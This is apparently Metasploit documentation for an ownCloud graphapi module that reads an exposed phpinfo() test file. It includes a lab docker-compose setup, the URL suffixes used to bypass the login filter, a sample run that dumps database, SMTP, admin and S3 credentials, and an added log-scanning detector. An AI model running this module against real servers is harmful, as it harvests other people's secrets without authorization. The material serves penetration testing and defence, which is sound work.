Owncloud Phpinfo Reader

documentation/modules/auxiliary/gather/owncloud_phpinfo_reader.md

Vulnerable Application

Docker containers of ownCloud compiled after February 2023 that have version 0.2.0 (before 0.2.1) or 0.3.0 (before 0.3.1) of the graph app installed contain a test file which prints phpinfo() to an unauthenticated user. A file name must be appended to the end of the URL to bypass the login filter. Docker may export sensitive environment variables, including ownCloud, DB, Redis, SMTP, and S3 credentials, as well as other host information.

Docker-Compose Build

Using docker-compose we can build a fairly robust system with plenty of information to pilfer.

Based on Ron Bowes' blog post

A list of environment variables is posted here

version: "3"

services:
  owncloud:
    image: owncloud/server:10.12.1
    container_name: owncloud_server
    restart: always
    ports:
      - 8080:8080
    depends_on:
      - mariadb
      - redis
    environment:
      - OWNCLOUD_DOMAIN=localhost:8080
      - OWNCLOUD_TRUSTED_DOMAINS=localhost
      - OWNCLOUD_DB_TYPE=mysql
      - OWNCLOUD_DB_NAME=owncloud
      - OWNCLOUD_DB_USERNAME=owncloud
      - OWNCLOUD_DB_PASSWORD=owncloud
      - OWNCLOUD_DB_HOST=mariadb
      - OWNCLOUD_ADMIN_USERNAME=admin_username
      - OWNCLOUD_ADMIN_PASSWORD=admin_password
      - OWNCLOUD_MYSQL_UTF8MB4=true
      - OWNCLOUD_REDIS_ENABLED=true
      - OWNCLOUD_REDIS_HOST=redis
      - APACHE_LOG_LEVEL=trace6
      - OWNCLOUD_MAIL_SMTP_PASSWORD=smtp_password
      - OWNCLOUD_MAIL_SMTP_NAME=smtp_username
      - OWNCLOUD_LICENSE_KEY=1122333
      - OWNCLOUD_OBJECTSTORE_KEY=owncloud123456
      - OWNCLOUD_OBJECTSTORE_SECRET=secret123456
      - OWNCLOUD_OBJECTSTORE_REGION=us-east-1
    healthcheck:
      test: ["CMD", "/usr/bin/healthcheck"]
      interval: 30s
      timeout: 10s
      retries: 5

  mariadb:
    image: mariadb:10.11 # minimum required ownCloud version is 10.9
    container_name: owncloud_mariadb
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=owncloud
      - MYSQL_USER=owncloud
      - MYSQL_PASSWORD=owncloud
      - MYSQL_DATABASE=owncloud
      - MARIADB_AUTO_UPGRADE=1
    command: ["--max-allowed-packet=128M", "--innodb-log-file-size=64M"]
    healthcheck:
      test: ["CMD", "mysqladmin", "ping", "-u", "root", "--password=owncloud"]
      interval: 10s
      timeout: 5s
      retries: 5

  redis:
    image: redis:6
    container_name: owncloud_redis
    restart: always
    command: ["--databases", "1"]
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 10s
      timeout: 5s
      retries: 5

You may need to add an additional entry to OWNCLOUD_TRUSTED_DOMAINS containing the IP address of the host, such as OWNCLOUD_TRUSTED_DOMAINS=localhost,192.68.1.1

If the graph app needs to be installed, use the following instructions:

docker exec -it owncloud_server /bin/bash
cd apps
wget "$(curl 'https://marketplace.owncloud.com/ajax/apps/graphapi/0.3.0' | sed 's/\\//g' | cut -d '"' -f 4)" -O graphapi-0.3.0.tar.gz
rm -rf graphapi
tar -zxf graphapi-0.3.0.tar.gz
occ app:enable graphapi

Verification Steps

  1. Install the application and plugin
  2. Start msfconsole
  3. Do: use auxiliary/gather/owncloud_phpinfo_reader
  4. Do: set rhost [ip]
  5. Do: run
  6. You should see information from the system configuration

Options

ROOT

Root path of the URI, which is different from TARGETURI as it's ownCloud specific. Defaults to all, which will try '' (empty) and owncloud

ENDFILE

The file path to add to the end of the URL, which is used to bypass filtering. Defaults to all, which will try /.css, /.js, /.svg, /.gif, /.png, /.html, /.ttf, /.woff, /.ico, /.jpg, /.jpeg, /.json, /.properties, /.min.map, /.js.map, /.auto.map
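
A defender-side check for the exposure described above, as an added example that is not part of the Metasploit module or its documentation: it scans web server access logs for requests to the GetPhpInfo.php test file under any ROOT prefix and with any ENDFILE-style suffix, and records per client whether any request was answered with a 200. The Apache combined log format, the function names, and the sample log lines (including their status codes) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Test file path as shown in the module output on this page (compared lowercased).
PHPINFO_PATH = "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/getphpinfo.php"

# Apache "combined" log format is assumed; adjust to your LogFormat.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def classify(line):
    """Return (ip, suffix, status) if the line requests the phpinfo test file, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the query string and decode percent-encoding before matching.
    path = unquote(urlsplit(m["target"]).path).lower()
    idx = path.find(PHPINFO_PATH)  # find() tolerates any ROOT prefix such as /owncloud
    if idx == -1:
        return None
    suffix = path[idx + len(PHPINFO_PATH):]  # e.g. "/.css"; "" when requested bare
    return m["ip"], suffix, int(m["status"])

def summarize(lines):
    """Group hits per client: suffixes tried and whether any request returned 200."""
    report = defaultdict(lambda: {"suffixes": set(), "served": False})
    for line in lines:
        hit = classify(line)
        if hit:
            ip, suffix, status = hit
            report[ip]["suffixes"].add(suffix)
            report[ip]["served"] |= status == 200
    return dict(report)

# Constructed sample log lines (documentation IP ranges, not from a real server).
P = "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
SAMPLE = [
    f'203.0.113.7 - - [03/Dec/2023:15:31:07 +0000] "GET {P} HTTP/1.1" 302 0 "-" "-"',
    f'203.0.113.7 - - [03/Dec/2023:15:31:09 +0000] "GET {P}/.css HTTP/1.1" 200 98211 "-" "-"',
    f'198.51.100.4 - - [03/Dec/2023:16:02:44 +0000] "GET /owncloud{P}%2F.js HTTP/1.1" 404 196 "-" "-"',
    '192.0.2.10 - - [03/Dec/2023:16:05:01 +0000] "GET /index.php/apps/files/ HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE).items():
        print(ip, sorted(info["suffixes"]), "SERVED" if info["served"] else "probe only")
```

A client marked as served should be treated as having read every environment variable in the container, so the credentials listed in the compose file need rotating.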

Scenarios

ownCloud 10.12.1 from Docker Compose

resource (owncloud.rb)> use auxiliary/gather/owncloud_phpinfo_reader
resource (owncloud.rb)> set rhosts 127.0.0.1
rhosts => 127.0.0.1
resource (owncloud.rb)> set verbose true
verbose => true
resource (owncloud.rb)> run
[*] Running module against 127.0.0.1
[*] Checking: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
[+] Found phpinfo page at: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
[+] Loot stored to: /home/h00die/.msf4/loot/20231203153109_default_127.0.0.1_owncloud.phpinfo_453632.txt
[+] License Key: 1122333
[+] Hostname: b2b16d6f3ba6
[+] Home: /root
[+] Server Root: /var/www/owncloud
[+] PWD: /var/www/owncloud
[+] SMTP Username: smtp_username
[+] SMTP Password: smtp_password
[+] ownCloud Username: admin_username
[+] ownCloud Password: admin_password
[+] DB Host: mariadb:3306
[+] DB Username: owncloud
[+] DB Password: owncloud
[+] DB Name: owncloud
[+] Redis Host: redis
[+] Redis Port: 6379
[+] Objectstore Endpoint: https://s3.us-east-1.amazonaws.com
[+] Objectstore Region: us-east-1
[+] Objectsore Secret: secret123456
[+] Objectstore Key: owncloud123456
[+] Objectstore Bucket: owncloud
[+] Credentials
===========

  Type             Host            Username             Password              Notes
  ----             ----            --------             --------              -----
  S3 Object Store  us-east-1       Key: owncloud123456  Secret: secret123456  Endpoint: https://s3.us-east-1.amazonaws.com, Bucket: owncloud
  SMTP             127.0.0.1:25    smtp_username        smtp_password
  mysql            127.0.0.1:8080  owncloud             owncloud
  ownCloud         127.0.0.1:8080  admin_username       admin_password

[*] Auxiliary module execution completed